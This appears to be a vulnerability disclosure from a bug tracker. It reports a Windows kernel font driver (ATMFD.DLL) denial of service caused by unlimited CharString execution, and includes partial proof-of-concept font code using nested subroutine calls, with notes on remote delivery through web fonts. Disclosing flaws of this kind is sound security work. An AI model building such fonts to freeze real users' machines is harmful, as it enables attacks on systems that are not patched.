|
|
Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution | |||||||
| Project Member Reported by mjurczyk@google.com, Nov 14 2014 | Back to list | |||||||
The Adobe Type Manager Font Driver (ATMFD.DLL) used by the Windows kernel to handle Type1 (.PFB + .PFM) and OpenType (.OTF) fonts does not limit the number of state machine instructions which can be executed per glyph, while e.g. FreeType set the maximum to 20'000'000.
By using multiple nested calls of subroutines and computationally expensive operations (such as drawing outlines), it is possible to cause ATMFD.DLL to get stuck in the main VM execution loop forever, thus consuming 100% of a single CPU (can be scaled to attack multiple CPUs) and implicitly creating an unkillable process.
The issue is reproducible with both Type-1 and OTF fonts on all Microsoft Windows editions (up to 8.1), regardless of bitness. The most obvious attack scenario would be to conduct the attack locally, but since CSS allows arbitrary OTF fonts to be embedded in websites, this can be potentially exploited in a remote manner in the context of browsers which use GDI for font rasterization. Other remote vectors (e.g. through PDF / Office documents) might also be viable, but have not been investigated.
The following CharString code causes 65536 drawing operations to be performed, which is sufficient to demonstrate the attack on any modern machine:
<CharString index="40">
-100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
</CharString>
<CharString index="41">
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
return
</CharString>
<CharString index="42">
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
return
</CharString>
<CharString index="43">
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
return
</CharString>
<CharString index="44">
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
return
</CharString>
[...]
<CharString name="A">
100 0 rmoveto -63 callsubr endchar
</CharString>
Attached are the following POC files:
1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf) compiled with the "ttx" utility, a part of an open-source "fonttools" project (https://github.com/behdad/fonttools/).
2) The source code of a Type-1 font (poc.pfa) and the resulting font (poc.pfb, poc.pfm) compiled with the "type1" utility, a part of the "Adobe Font Development Kit for OpenType" software package (http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).
Project Member
Comment 1
by
mjurczyk@google.com,
Nov 14 2014
,
Nov 18 2014
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
,
Dec 4 2014
,
Dec 11 2014
,
Mar 24 2015
,
Apr 1 2015
,
Apr 20 2015
,
Jun 12 2015
|
||||||||
| ► Sign in to add a comment | ||||||||